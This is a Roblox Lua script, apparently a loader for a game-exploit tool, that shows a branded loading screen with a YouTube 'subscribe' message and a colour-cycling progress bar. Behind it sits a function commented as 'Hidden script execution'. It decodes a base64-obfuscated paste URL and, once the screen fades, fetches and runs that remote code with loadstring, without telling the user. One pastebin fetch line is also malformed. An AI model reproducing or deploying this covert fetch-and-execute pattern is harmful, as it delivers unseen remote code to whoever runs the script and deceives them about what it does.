local TweenService = game:GetService("TweenService")
local Players = game:GetService("Players")
local player = Players.LocalPlayer

local gui = Instance.new("ScreenGui", player:WaitForChild("PlayerGui"))
gui.ResetOnSpawn = false
gui.Name = "DarkLoadUI"

local bg = Instance.new("Frame", gui)
bg.Size = UDim2.new(0, 420, 0, 220)
bg.Position = UDim2.new(0.5, 0, 0.5, 0)
bg.AnchorPoint = Vector2.new(0.5, 0.5)
bg.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
bg.BorderSizePixel = 0
bg.BackgroundTransparency = 0
Instance.new("UICorner", bg).CornerRadius = UDim.new(0, 12)

local title = Instance.new("TextLabel", bg)
title.Size = UDim2.new(1, -40, 0, 50)
title.Position = UDim2.new(0, 20, 0, 15)
title.BackgroundTransparency = 1
title.Text = "Youtube : Lemontamashi"
title.TextColor3 = Color3.fromRGB(255, 255, 255)
title.TextScaled = true
title.Font = Enum.Font.GothamBold

local barBG = Instance.new("Frame", bg)
barBG.Size = UDim2.new(0.9, 0, 0, 24)
barBG.Position = UDim2.new(0.05, 0, 0.55, 0)
barBG.BackgroundColor3 = Color3.fromRGB(50, 50, 50)
barBG.BorderSizePixel = 0
Instance.new("UICorner", barBG).CornerRadius = UDim.new(0, 12)

local fill = Instance.new("Frame", barBG)
fill.Size = UDim2.new(0, 0, 1, 0)
fill.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
fill.BorderSizePixel = 0
Instance.new("UICorner", fill).CornerRadius = UDim.new(0, 12)

local message = Instance.new("TextLabel", bg)
message.Size = UDim2.new(1, -40, 0, 40)
message.Position = UDim2.new(0, 20, 1, -50)
message.BackgroundTransparency = 1
message.TextColor3 = Color3.fromRGB(255, 255, 255)
message.TextScaled = true
message.Font = Enum.Font.Gotham
message.Text = "Don't Forget to subscribe!"

spawn(function()
	while true do
		for i = 0, 255, 5 do
			fill.BackgroundColor3 = Color3.fromRGB(255, i, 0) wait() end
		for i = 255, 0, -5 do
			fill.BackgroundColor3 = Color3.fromRGB(i, 255, 0) wait() end
		for i = 0, 255, 5 do
			fill.BackgroundColor3 = Color3.fromRGB(0, 255, i) wait() end
		for i = 255, 0, -5 do
			fill.BackgroundColor3 = Color3.fromRGB(0, i, 255) wait() end
	end
end)

local tween = TweenService:Create(fill, TweenInfo.new(20, Enum.EasingStyle.Linear), {Size = UDim2.new(1, 0, 1, 0)})
tween:Play()

delay(10, function()
	message.Text = "Rayfield Is Generating. Please Wait."
end)

-- Hidden script execution
local function runSecret()
	local b64 = "aHR0cHM6Ly9wYXN0ZWZ5LmFwcC9zbTFTakt2WC9yYXc="
	local http = game:HttpGet(game:HttpGet("https://pastebin.com/raw/9qT6S0wE"):sub(1,0) or b64)
	local decode = game:GetService("HttpService"):Base64Decode(b64)
	loadstring(game:HttpGet(decode))()
end

tween.Completed:Connect(function()
	for _, v in pairs(bg:GetDescendants()) do
		if v:IsA("TextLabel") then
			TweenService:Create(v, TweenInfo.new(1), {TextTransparency = 1}):Play()
		elseif v:IsA("Frame") or v:IsA("ImageLabel") then
			TweenService:Create(v, TweenInfo.new(1), {BackgroundTransparency = 1}):Play()
		end
	end
	TweenService:Create(bg, TweenInfo.new(1), {BackgroundTransparency = 1}):Play()

	wait(1.2)
	gui:Destroy()

	runSecret() -- Execute hidden script
end)
